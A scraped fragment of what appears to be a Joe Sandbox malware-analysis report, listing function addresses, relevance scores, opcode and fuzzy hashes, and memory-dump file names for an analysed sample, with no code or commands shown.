                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3731ab24ad917baa2201b49989f974fc9ec21f8e7a5faaeda7b2884dcf080c18
                                            • Instruction ID: 4881d5d6e465c10000af537ec8e3c870f47437f695439e73104cb08d5e29c8e3
                                            • Opcode Fuzzy Hash: 3731ab24ad917baa2201b49989f974fc9ec21f8e7a5faaeda7b2884dcf080c18
                                            • Instruction Fuzzy Hash: C481C561D09B8457E6219B359E417EBB3E4AFE9344F09DB29BD8C61113FB30B9D88342
                                            Function 00C0D430 Relevance: .2, Instructions: 208COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20908b893dd83236dfa946c4d1b1f528584095159185b31f43fe50da6f548cfa
                                            • Instruction ID: e26eb4ae3f449e43a546bbf2a307491b3de6dda34a98778eb916baeae70b7503
                                            • Opcode Fuzzy Hash: 20908b893dd83236dfa946c4d1b1f528584095159185b31f43fe50da6f548cfa
                                            • Instruction Fuzzy Hash: 4D81E972D18B828BD3159F68C8906B6BBA0FFDA314F144B5EE8E7067C2E7749681C741
                                            Function 00C06730 Relevance: .2, Instructions: 204COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb1ae8665c3afbf29995289e943eabd83bd2ff3f67c18dd2c2f90a954513df95
                                            • Instruction ID: 6e01c7343d2bae29173cb4ad0427f1132c9e4cc92dd9406b1838b1e02ae61ca8
                                            • Opcode Fuzzy Hash: fb1ae8665c3afbf29995289e943eabd83bd2ff3f67c18dd2c2f90a954513df95
                                            • Instruction Fuzzy Hash: 1F810A72D14B828BD3149F24C8906B6B7A0FFDA314F249B1EE8E617783E7749691D780
                                            Function 00C135B0 Relevance: .2, Instructions: 200COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76de8c8ecdb1b8c4bb38072a85ed8fc3833786530a2478f1319434a681140944
                                            • Instruction ID: d3b027f2dfc46d6f282c8dca7600736c9241d3bf474b15c2c154ce7f89e2be5f
                                            • Opcode Fuzzy Hash: 76de8c8ecdb1b8c4bb38072a85ed8fc3833786530a2478f1319434a681140944
                                            • Instruction Fuzzy Hash: F2612872D087D08BD7118F2488806A97BA2AFD7318F25C36EF8955B397E774DA82D740
                                            Function 00A34B60 Relevance: .2, Instructions: 166COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd600083a51461a80366e4987ab5b425efc6b935ac1eb0d6be00ceec31919ec4
                                            • Instruction ID: 327661728e5caf8996aa5344ca07b41ac5af1e993a01e2db763c229085bfa76b
                                            • Opcode Fuzzy Hash: dd600083a51461a80366e4987ab5b425efc6b935ac1eb0d6be00ceec31919ec4
                                            • Instruction Fuzzy Hash: 3B41D277F206280BE34C996A9C6526A73C2D7C4310F4A463DDA96E73D2ED74DD1693C0
                                            Function 00C2A000 Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                            • Instruction ID: cde2b1b1a56eadd745ddf45655b9882130e175ae1f0145e1b99a6ec137dcbd9f
                                            • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                            • Instruction Fuzzy Hash: DF31D6313083294BC714ED6EE8C022AF6D39BD8760F55C63DE58AC3B80E9719C598786
                                            Function 00B5AB2C Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                            • Instruction ID: 86ea8d8eab95826f8431475b5d35b344244890f13d46984f2905c926b558d6ba
                                            • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                            • Instruction Fuzzy Hash: B6F0AF33B612290B93A0DDB66C00296A2C3A3C0370F1F86E5EC44E7502E9348C4A86C6
                                            Function 00B5AAC0 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                            • Instruction ID: 7310bc01c02b78380a2f3c339cb0187a7ccd264a2ad30feb768d51ac7b68e2cf
                                            • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                            • Instruction Fuzzy Hash: 5EF01C33A20A344B6360CD7A8D05597A2D79BC86B0B1FCA69ECA5E7206E930EC0656D5
                                            Function 00906810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: [
                                            • API String ID: 0-784033777
                                            • Opcode ID: 7d788827ed7c04f23523fcdd314ed5ed3ec90e895d64c9b57deeea2faa615391
                                            • Instruction ID: 7e7753461a7a68907ad61285fb6cbbb7999a2ddb235416a2a27aa99a80e4e37d
                                            • Opcode Fuzzy Hash: 7d788827ed7c04f23523fcdd314ed5ed3ec90e895d64c9b57deeea2faa615391
                                            • Instruction Fuzzy Hash: 34B167B1A0C3A25FEB359A24889073BBBDCEF55304F18092DF9C5C61C1EB39C9A49752